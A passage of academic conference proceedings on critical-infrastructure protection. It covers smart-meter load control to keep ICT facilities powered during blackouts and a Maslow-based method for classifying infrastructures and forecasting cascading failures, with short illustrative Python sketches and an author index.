In addition, in this potentially dangerous operating mode there are threats arising from liability issues, endangering the network operator's staff and even the general population. In recent years, electrical networks have been designed and partially investigated under the terms "Smart Grid" or "Micro Grid". They incorporate extensive communication between the network users, and in them sophistication moves down the traditional hierarchy: every node in the power network of the future will be awake, responsive, adaptive, price-smart, eco-sensitive, real-time, flexible, and interconnected with everything else. A very promising new technology for making the network more flexible at the low network level is "Smart Metering" [7], [8]. The traditional electricity meters are replaced by intelligent remote terminal devices which, in addition to their metering function, can communicate at least with the network dispatching centre. In the event of a disaster, the dispatching centre is thus in a position to determine the network situation in a much more detailed and precise way than in the past. It is enabled to re-construct stable network islands and to operate them by fine-tuning the load according to the available energy (see Fig. 3). Especially in the case of limited energy resources, it is possible to localize individual interruptible customer groups for the purpose of load shedding. An even more sophisticated way to make the best of limited energy is to restrict the bulk of the consumers to vital applications such as information and emergency lighting. Through smart-meter technology the limited but still available energy is routed reliably to the critical infrastructure applications, namely the ICT nodes.
Fig. 3. Principle of a smart grid with smart meters to control limited energy flow. Legend: 1. Defective high-level network; 2. Generator, decentralized generation; 3. Smart meter with disconnected load; 4. Smart meter with limited or unlimited load
In such networks it is expected that, in the event of a failure of the upstream supply level, controlled island operation can be maintained. At present there is no extensive experience with such decentralized stable islands. A general supply by means of these networks has to be studied in greater detail as an alternative to the currently practised "area load shedding".
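The fine-tuning of load against available energy described above amounts, at its simplest, to a selection problem at the dispatching centre. A minimal sketch under stated assumptions: every load is remotely switchable via its smart meter, carries a priority (ICT nodes and emergency lighting highest), and the island's available generation is known; names and figures are illustrative:

```python
def shed_loads(loads, available_kw):
    """Decide which loads stay connected in a network island.

    loads: (name, demand_kw, priority) tuples; a lower priority value
    means more critical. Returns the names of the loads kept on line.
    """
    kept, used_kw = [], 0.0
    for name, demand_kw, _prio in sorted(loads, key=lambda l: l[2]):
        if used_kw + demand_kw <= available_kw:
            kept.append(name)
            used_kw += demand_kw
    return kept

island = [("ICT node", 40, 0), ("emergency lighting", 10, 0),
          ("households", 300, 2), ("industry feeder", 500, 3)]
print(shed_loads(island, available_kw=120))  # ['ICT node', 'emergency lighting']
```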
5 Summary and Outlook
Ensuring the supply of electricity to ICT facilities increases the safety of citizens: it allows them, despite a large-scale disruption of the electricity supply, to obtain relevant information and – if necessary – to contact state authorities or blue-light organizations. In this paper the hazard potential for ICT facilities in the case of a failure of the public power supply has been demonstrated, and changes in the operation of the electrical networks, alterations in the ICT facilities, and suitably extended "Smart Grids" or "Micro Grids" have been noted as potential solutions.
Technically possible and economically feasible solutions will include measures on the part of the electricity network operators (new equipment and changed operational management), measures concerning end-user equipment, and measures which combine both the network and the ICT side. A key enabler is the new technology of smart metering, i.e. special low-voltage switching apparatus: by these meters the limited power is channelled to the critical ICT infrastructure, and in conjunction with still-functioning decentralised energy sources a potential emergency supply can be built up. Related issues include fundamental legal clarifications. As investigations into reactive power breakdowns have already demonstrated, there are unresolved legal problems in the area of civil law; technically feasible solutions on the network side therefore require additional clarification in the area of civil law.
References

1. Happoldt, H., Oeding, D.: Elektrische Kraftwerke und Netze, 5th edn. Springer, Berlin (1978)
2. Schrümpf, E.-G.: Stromausfall – und danach? e&i 125/5 (2008)
3. Voltage characteristics of electricity supplied by public distribution systems, Standard CENELEC EN 50160:1994
4. Siegmund, G.: Technik der Netze, 5th edn., 2002. Hüthig Verlag, Heidelberg (2007)
5. Trends in Telecommunication Reform 2007: The Road to Next Generation Networks (NGN). ITU (2007)
6. Mouly, M., Pautet, M.-B.: The GSM System for Mobile Communications (1992)
7. Siemens Power Transmission and Distribution, Energy Automation Division, 90026 Nürnberg: Information mit System, Best.-Nr. E50001-U330-A186 (2008)
8. Siemens Aktiengesellschaft Österreich: AMIS – Automated Metering and Information System, TD-3520/TASU30, Nr. M23-013-1.00 (2006)
An Effective Approach for Cascading Effects Prevision in Critical Infrastructures

Luisa Franchina¹, Marco Carbonelli¹, Laura Gratta¹, Claudio Petricca¹, and Daniele Perucchini²
¹ Critical Infrastructures experts, Italy
² Fondazione Ugo Bordoni, Italy
Abstract. The recent dramatic experiences caused by natural or man-made disasters make it mandatory to understand and manage the mutual dependency of those infrastructures that, if disrupted or destroyed, would seriously compromise our quality of life. Although many models have been developed to study particular contexts and single infrastructure sectors, a global strategy to represent and manage the complex issue of infrastructure dependency has not been deployed yet. This paper presents a heuristic approach that can be applied, on several different scales, to select Critical Infrastructures and to model dependencies, thus paving the way for the prevention and governance of cascading effects.
1 Introduction
Modern western countries have developed a model of society characterized by a high quality of life, meaning that basic services are available to citizens to let them express their attitudes at best and to satisfy their needs. Examples of such services are energy provision, healthcare, transport, banking and finance. In recent years, dramatic experiences caused by natural or man-made disasters have made it urgent to understand the dependency of our society on those infrastructures that, if disrupted or destroyed, would seriously compromise our quality of life ([1], [2]). Single sectors of critical infrastructure have long since developed criteria to protect their assets. For example, in the ICT sector various best practices and standards are available to assess the security of systems and infrastructures ([3], [4]) and to design appropriate security measures. Nevertheless, this is not sufficient to guarantee end users against service interruptions; two considerations must be made:

– modern critical infrastructures are strictly inter-connected; consequently, a binding analysis of interconnections is mandatory in order to achieve an effective preview of cascading effects;
– some critical infrastructure operators rely on insurance contracts in order to guarantee business continuity, regardless of the actual availability of the service; this approach does not provide any guarantee for end users in terms of service continuity.
Based on these considerations, intense activity has been undertaken in the international community. The USA, following the 9/11 events, deployed a detailed and organic national strategy for homeland protection, which entailed the creation of the Department of Homeland Security (DHS). In July 2002 the first version of the National Strategy for Homeland Security was released; it has been updated up to the latest version of July 2007 ([5]). One of the six critical mission areas identified in the strategy aims at protecting Critical Infrastructures and key assets. Within the EU, the Justice and Home Affairs (JHA) Council of June 2008 approved the text of the Directive on the identification and designation of European Critical Infrastructure and the assessment of the need to improve their protection. The approval of the Directive represents the final step of a normative path undertaken since the European Council of June 2004, which asked the Commission to prepare a global strategy for the protection of Critical Infrastructures. The Directive lays out the measures established by the Commission in order to guarantee the correct operation of European Critical Infrastructures, i.e., those infrastructures whose disruption or destruction would have a significant impact on the quality of life of citizens in at least two Member States of the Union. In this paper, after a brief introduction to the problem of Critical Infrastructure (CI) protection, a methodology for the classification and analysis of CIs is proposed. This methodology turns out to be useful to map the dependencies among different CIs, providing tools for the forecasting of cascading effects. The paper aims at providing a flexible and effective instrument for the planning and coordination of prevision and prevention measures to safeguard citizens and nations. Moreover, since the methodology does not require high computational complexity, it can be effectively employed both as an ex-ante instrument to prevent risks and as an ex-post tool to prioritize emergency interventions.
2 A Methodology to Classify Critical Infrastructures
In this section a methodology is illustrated for selecting and analyzing Critical Infrastructures (CIs), meaning by this expression those assets, systems or parts thereof that are essential for the maintenance of vital social functions, health, security, safety, and the economic and social welfare of people, and whose destruction or malfunctioning would, through the loss of these functions, have a significant direct impact on the population.
2.1 A Sociological Approach
The approach introduced here for the selection of CIs makes it possible to analyze CIs and their inter-dependencies in an organic way, and to account for the peculiarities of the nation the analysis refers to. The approach includes the following steps:

– analysis of the primary needs of the population;
– selection of the resources necessary to satisfy the primary needs;
– analysis of every resource identified in step 2, to find out, according to predefined criteria and metrics, its criticalities and dependencies.

The use of a systematic statement of the population's needs as a starting point in the selection of infrastructures lends rigour to the process itself, leading to an organic and complete overall picture. It is to be noted that the most common approaches ([5], [6], [7]) proceed by enumerating the critical sectors in an axiomatic way, without paying attention to the reasons why they are to be identified as critical and without enforcing coherence among sector definitions to avoid overlaps or gaps. As a consequence, in many cases the selected sectors are not suitable for a detailed analysis of interdependencies among sectors and sub-sectors. With reference to step 1, the hierarchy of needs proposed by Maslow [8] is useful for selecting the primary needs. The primary needs of the individual are classified in five levels (Maslow's Hierarchy), starting from the most elementary ones (necessary for survival) and reaching the most complex (sociological) ones:

Level 1: Physiological (hunger, thirst, ...)
Level 2: Safety and security
Level 3: Belonging (love, identification, ...)
Level 4: Self-esteem (achievement, success, ...)
Level 5: Self-actualization (fulfilment of expectations)

The second step in the process consists in identifying the resources necessary to satisfy these basic needs. Tab. 1 shows an example of the results of this process for a generic western country; the table shows, for each level of the hierarchy, the resources necessary to satisfy it.
Table 1. Resources realizing the needs of Maslow's hierarchy (example)

Level 1: Food, Water, Energy, Health, Essential goods, Environment
Level 2: Transport, Finance, Non-essential goods
Level 3: Communication, Culture, icons, meeting places
Level 4: Information, Public administration
It is to be noted that, following Maslow's approach, resources related to a given level of the hierarchy are not replicated in the levels above, since the satisfaction of the needs of a given level presupposes the satisfaction of all the levels below. It can also be observed that no resource is listed for level 5. This is because the needs of this level have an introspective nature: they are not likely to be satisfied by means of external resources, but only by inner motivation. This classification alone is not sufficient to carry out an accurate analysis of dependencies; its level of abstraction is too high to analyse the complex dynamics linking resources. The proposed top-down classification is therefore based on three distinct levels of abstraction: resources, items and components.
Fig. 1. Refinement of the basic needs and chain of generation
A resource is defined as a homogeneous conceptual area allowing the needs of the population to be satisfied. For example, transport is a resource. An item defines a specific sub-area of a resource; it can be characterized by:

– the service/product it delivers, if it is unique (for example, an item of the resource water is drinkable water);
– the chain of generation (from raw materials to user fruition) it is made of, if it has at least one step separated from the chains of the other sub-sectors (for example, for the resource transport, the item rail transport will differ from the item road transport by virtue of their chains of generation).

A resource usually includes several distinct items. For example, the items of the resource transport could be: road transport, air transport, rail transport, maritime transport, inland water transport. A component represents a phase in the chain of generation that, starting from the processing of the raw materials composing the item, leads to its fruition by the end user. The components of the chain are production, transport, distribution and use, as shown in Fig. 1, and defined below:

– production: collection and processing of raw materials, up to the creation of the item itself;
– transport: transfer of the item from the production site to the freight routing; it includes shipment and stocking;
– distribution: delivery of the item from the stocking site to the end user; it also includes, at the local level, stocking and distribution;
– use: the possibility for the user to obtain the product/service according to defined quality parameters and at reasonable rates; this phase includes retail and service provision to end users.

The chain-of-generation paradigm can be applied to all the selected items: in some cases one or more steps (e.g. transport and distribution) will be missing; in any case, an item can always be thought of as a service/product together with the various components of its generation. It is worth noting that, in more specific sectoral analyses, it could be necessary to split the single components into further detailed elements, which can coincide with the assets of the infrastructure. In the following we apply the described approach, representing, as an example, the resources necessary to satisfy basic needs in a generic Western country. Tab. 2 shows a possible structured classification in resources and items.
Table 2. Resources and items classification

Food: Perishable food, Un-perishable food
Water: Drinkable water, Irrigation water
Energy: Electric energy, Gas, Fuel, Wood, Coal
Health: Health service, Medicines and sanitary aids, Emergency services
Environment: Dangerous sites security, Environment protection, Drainage water
Transport: Rail, Air, Road, Maritime (sea, river)
Communication: Data exchange on Internet, Telephony, Satellite and Postal services
Information: Broadcasting, Publishing, Internet information
Public Administration: National and local institutions, Public security, Justice, Services to population (licences, authorizations, etc.), Defense
Finance: Financial transactions, Stock exchange
Culture, icons, meeting places: Education, Preservation of icons and heritage, Cultural/artistic assets, Safety of meeting places
Essential goods: –
Non-essential goods: –
This table can be further refined with sector-specific expertise. It provides a suitable basis for proceeding with the analysis of dependencies and cascading effects.
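The three-level taxonomy (resources, items, components) translates directly into a machine-readable structure on which the dependency analysis of the following sections can operate. A minimal sketch; the names come from Table 2, while the encoding itself is merely one convenient choice, not part of the methodology:

```python
from dataclasses import dataclass, field
from typing import List, Tuple

# Components of the chain of generation; for some items one or more are absent.
CHAIN: Tuple[str, ...] = ("production", "transport", "distribution", "use")

@dataclass
class Item:
    name: str
    components: Tuple[str, ...] = CHAIN

@dataclass
class Resource:
    name: str
    items: List[Item] = field(default_factory=list)

water = Resource("Water", [Item("Drinkable water"), Item("Irrigation water")])
transport = Resource("Transport",
                     [Item(m) for m in ("Rail", "Air", "Road", "Maritime")])
```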
3 Criticality Criteria
So far we have identified a classification of infrastructures (resources, items, components, elements). Whichever classification method is adopted, however, to single out critical infrastructures it is necessary to apply a criticality criterion that sets a threshold of criticality. To this aim, different approaches can be adopted, for example:

– Ex-ante consequence evaluation approach: this approach evaluates on an ex-ante basis the potential effects of the disruption or destruction of an infrastructure. It implies setting up predefined thresholds for each parameter (for example, the number of fatalities or injuries, the economic loss and the impact on public confidence) together with consistent measurement methods. This kind of approach was followed, for example, in the EU Directive [6];
– Ex-post dynamic approach: based on the quality and amount of emergency services needed to face the crisis and overcome it; this approach is adopted by the Italian civil protection, which on this basis defines three increasingly critical kinds of events. In particular, the Italian approach defines a bottom-up methodology in which an event that affects an infrastructure can be classified from the local (municipal) level, to the regional level, up to the national level (managed by the Civil Protection Department). This criterion applies the subsidiarity principle;
– Ex-ante needs approach: based on Maslow levels, the criticality of infrastructures can be related to the hierarchical level of the needs they satisfy. This approach can typically be adopted as a first pre-selection criterion in the identification
of infrastructures to be classified as critical. It lacks a coverage evaluation, which means that all infrastructures related to a need are defined as critical, independently of their coverage. Further, we observe that criticality criteria define CIs and not critical networks of infrastructures, which means that dependencies are to be evaluated on the basis of the criticality to be satisfied. Obviously, it is possible to define several other criteria for criticality identification. Any of these approaches can be used depending on the kind of analysis we want to perform (ex-ante, ex-post, etc.), but the overall judgment has to take into account the possibility of applying them in a repeatable, reliable way, providing the same result when applied to the same taxonomy and the same scenario at different time instants or in different geographical sites. Measurement methods for such criteria have to be identified and standardized to guarantee fairness.
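In the ex-ante consequence evaluation approach, for instance, the criticality test reduces to comparing impact parameters against predefined thresholds. A minimal sketch; the parameter names and threshold values are purely illustrative assumptions, not figures from the EU Directive:

```python
# Illustrative thresholds only: an infrastructure is flagged critical if any
# impact parameter of its worst-case disruption reaches its threshold.
THRESHOLDS = {
    "fatalities": 10,
    "economic_loss_meur": 100.0,
    "public_confidence_loss": 0.3,  # fraction of population losing confidence
}

def is_critical(impact: dict) -> bool:
    return any(impact.get(name, 0) >= limit for name, limit in THRESHOLDS.items())

print(is_critical({"fatalities": 2, "economic_loss_meur": 250.0}))  # True
print(is_critical({"fatalities": 2, "economic_loss_meur": 40.0}))   # False
```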
4 From Resource Classification to Evaluation of Cascading Effects
Once Critical Infrastructures have been identified by adopting the selected criticality criterion, it is to be noted that the continuity of essential services cannot be guaranteed by protecting single infrastructures: a systematic analysis of the dependencies existing among the various critical infrastructures must be carried out. This allows both to outline the patterns of possible cascading effects and to provide useful information to define a central coordination strategy aiming at minimizing the effects of the dependencies among items. The study of dependencies can be split into two analysis steps, followed by a synthesis step. The first analysis step, the sectoral one, is carried out by the operators of the infrastructures providing a given item; they know all the actual causes that could make the item itself unusable. A first output of this analysis will be a rough indication of the dependencies on other items; the dependencies can be represented as an array, as shown in Fig. 2, sketching the dependencies of item j on the other n items. A second output of the first step will be, as shown in Fig. 3.1, a discrete indication, at different times, of the impact severity induced on item j as a result of a breakdown of each of the other items (the columns of the array).
Fig. 2. Item dependencies array
Fig. 3. Time evolution of impact severity
Fig. 4. Cascading effect forecasting maps on a predefined geographical scale
The arrays shown in the figure give a snapshot of the evolution over time, on a predefined geographical scale, of the impact severity (represented by four different values) of the disruption induced by the items in the columns on the observed item j. In Fig. 3.1, the dashed square means that a breakdown of item 1 causes only a low impact on item j after 4 and 24 hours. After 4 days, however, the same square turns light grey, meaning that in this time frame the breakdown of item 1 causes medium-severity damage to the availability of item j. Eventually, after 4 weeks the same square turns black, meaning that the severity of the impact on item j of a breakdown of item 1 has become critical. Similar considerations and array-based tools can be adopted to represent the replaceability of the items that affect the correct operation of the item under observation, or the evolution in time of the impacted geographical area. In the second analysis step, the results of the sectoral analyses are used for a holistic analysis, aimed at outlining in a single view the overall dependencies of each item on all other items. To this end, matrix-based tools are used, such as, for example, synthetic maps of the time evolution of the impact severity, as shown in Fig. 3.2. Similarly to Fig. 3.1, the matrices shown in Fig. 3.2 give a snapshot of the evolution over time of the impact severity for all items. Further, similar maps can be drawn to represent the replaceability of items as a function of time and cost, or the evolution in time of the impacted geographical area. As a final synthesis step of the proposed process, utilizing all the gathered information, it is possible to build cascading-effects forecasting maps. This tool is fundamental in the prevention and management of emergencies, helping to take fast decisions that avoid or bound the impact of possible breakdowns of an item on other items. Fig. 4 shows the time evolution, in the 4-hour, 24-hour, 4-day and 4-week time frames, of the cascading effect following the lack
of item x at time t0: this representation can be provided for all items and for all geographical scales of interest.
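The array-based tools of this section can be prototyped with very little machinery. A minimal sketch under stated assumptions: severity takes the four discrete values of the maps (0 = none, 1 = low, 2 = medium, 3 = critical), and one matrix per time frame gives, in entry (i, j), the severity induced on item i by a breakdown of item j; the item names and matrix values are invented for illustration:

```python
ITEMS = ("electric energy", "telephony", "drinkable water")  # illustrative items
FRAMES = ("4 h", "24 h", "4 days", "4 weeks")

# D[frame][i][j]: severity induced on item i by a breakdown of item j
# (0 = none, 1 = low, 2 = medium, 3 = critical). Values are invented.
D = {
    "4 h":     [[0, 0, 0], [1, 0, 0], [0, 0, 0]],
    "24 h":    [[0, 0, 0], [2, 0, 0], [1, 0, 0]],
    "4 days":  [[0, 0, 0], [3, 0, 0], [2, 1, 0]],
    "4 weeks": [[0, 0, 0], [3, 0, 0], [3, 1, 0]],
}

def forecast(broken: str) -> None:
    """Print the impact severity on every item after 'broken' fails at t0."""
    j = ITEMS.index(broken)
    for frame in FRAMES:
        print(frame, {ITEMS[i]: D[frame][i][j] for i in range(len(ITEMS))})

forecast("electric energy")
```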
5 Conclusions
In this paper an approach to classify critical infrastructures starting from the basic needs of citizens has been described, and a methodology to outline interdependencies and foresee possible cascading effects has been presented. By means of the proposed methodology it is possible to detect the major criticalities in each context, in order to direct the efforts and countermeasures that prevent the occurrence of cascading effects among infrastructures. Due to the heuristic nature of the methodology, a further effort is required to accurately classify resources, items and components, and to tune the criticality thresholds. This work can only be done with the contribution of sector-specific expertise.
References

[1] Lewis, T.G.: Critical Infrastructure Protection in Homeland Security: Defending a Networked Nation. John Wiley & Sons, Chichester (2006)
[2] Hyslop, M.: Critical Information Infrastructures: Resilience and Protection. Springer Science+Business Media, Heidelberg (2007)
[3] ISO/IEC 15408, Common Criteria for Information Technology Security Evaluation, Part 1: Introduction and general model, version 2.3 (August 2005)
[4] ISO 27001, Information Security Management – Specification with Guidance for Use (October 2005)
[5] National Strategy for Homeland Security (October 2007), http://www.dhs.gov/xlibrary/assets/nat_strat_homelandsecurity_2007.pdf
[6] Proposal for a Directive of the Council on the identification and designation of European Critical Infrastructure and the assessment of the need to improve their protection, Brussels, 22/05/2008
[7] Best Practices for Improving CIIP in Collaboration of Governmental Bodies with Operators of Critical Information Infrastructures
[8] Maslow, A.: Motivation and Personality. Harper, New York (1954)
Author Index

Abou El Kalam, Anas  95
Albrechtsen, Eirik  235
Ali, Manou  190
Asplund, Mikael  258
Assogna, Pierluigi  368
Baldini, Gianmarco  271
Batista Jr., Aguinaldo B.  200
Beccuti, Marco  48
Beitollahi, Hakem  223
Bertocchi, Glauco  368
Beyel, Césaire  36
Blackwell, Joshua  24, 352
Bobbio, Andrea  328
Bompard, Ettore  144
Brito Jr., Agostinho M.  200
Buschmann, Robert  119
Cadini, Francesco  155
Carbonelli, Marco  386
Carcano, Andrea  211
Casalicchio, Emiliano  72
Castorini, Elisa  14
Cerotti, Davide  328
Chiaradonna, Silvano  60
Cruz, Edite  302
D'Antonio, Salvatore  109
Deconinck, Geert  223
Dellwing, Hermann  119
Deswarte, Yves  95
Di Giandomenico, Felicita  60
DiCarlo, Antonio  368
Dionisi, Carla  1
Donatelli, Susanna  311
Dondossola, Giovanna  223
dos Santos, Selan R.  168
Eliades, Demetrios G.  360
Felkner, Anna  344
Fernández, Marcel  287
Fickert, Lothar  376
Filho, José Macedo F.  200
Fioriti, Vincenzo  14
Flammini, Francesco  180, 336
Fovino, Igor Nai  211, 271
Franceschinis, Giuliana  48
Franchina, Luisa  386
Gadomski, Adam Maria  319
Gaglione, Andrea  180
Galli, Emanuele  72
Garrone, Fabrizio  223
Geretshuber, Stefan  119
Gonzalez, Jose J.  295
Gratta, Laura  386
Gribaudo, Marco  328
Gustavsson, Rune  84
Jaatun, Martin Gilje  235
Johnsen, Stig Ole  235
Johnson, E. Wray  24
Kaâniche, Mohamed  48
Kanoun, Karama  48
Khelil, Abdelmajid  109
Kivimaa, Jüri  279
Klaver, Marieke  302
Klein, Rüdiger  36, 131
Kobayashi, Tiago H.  200
Kozakiewicz, Adam  344
Kruk, Tomasz Jordan  344
Lee, Seok-Won  24, 352
Leick, Claus  119
Line, Maria B.  235
Linnemann, Ralf  36
Lollini, Paolo  60
Longva, Odd Helge  235
Luiijf, Eric  190, 302
Malleck, Helmut  376
Marchei, Elena  14
Mariani, Francesca  1
Marsh, Lydia  24, 352
Masera, Marcelo  144, 211
Mazzocca, Nicola  180, 336
Medeiros, João Paulo S.  168, 200
Milicchio, Franco  368
Motta Pires, Paulo S.  200
Nadjm-Tehrani, Simin  258
Napoli, Roberto  144
Nieuwenhuijs, Albert  302
Ojamaa, Andres  279
Paoluzzi, Alberto  368
Perucchini, Daniele  386
Petrescu, Cristina-Andreea  155
Petricca, Claudio  386
Polycarpou, Marios M.  360
Pragliola, Concetta  180, 336
Recchioni, Maria Cristina  1
Reinhardt, Wolf  36
Romano, Luigi  109
Rome, Erich  36
Rosato, Vittorio  14
Ruzzante, Silvia  14
Sarriegi, Jose Maria  247, 295
Schwaegerl, Christine  119
Scorzelli, Giorgio  368
Seifert, Olaf  119
Sigholm, Johan  258
Soriano, Miguel  287
Ståhl, Björn  84
Suri, Neeraj  109
Sveen, Finn Olav  247, 295
Tolone, William J.  24, 352
Tomàs-Buliart, Joan  287
Tøndel, Inger Anne  235
Torres, Jose Manuel  247, 295
Trombetta, Alberto  211
Tucci, Salvatore  72
Tyugu, Enn  279
Usov, Andrij  36
van Eeten, Michel  302
Vicentino, Michele  368
Vittorini, Valeria  336
Wakolbinger, Christian  376
Wærø, Irene  235
Xiang, Wei-Ning  24, 352
Xue, Fei  144
Yeager, Cody  24
Zielstra, Annemarie  190
Zimny, Tomasz Adam  319
Zio, Enrico  155
Zirilli, Francesco  1
Zollo, Roberto  368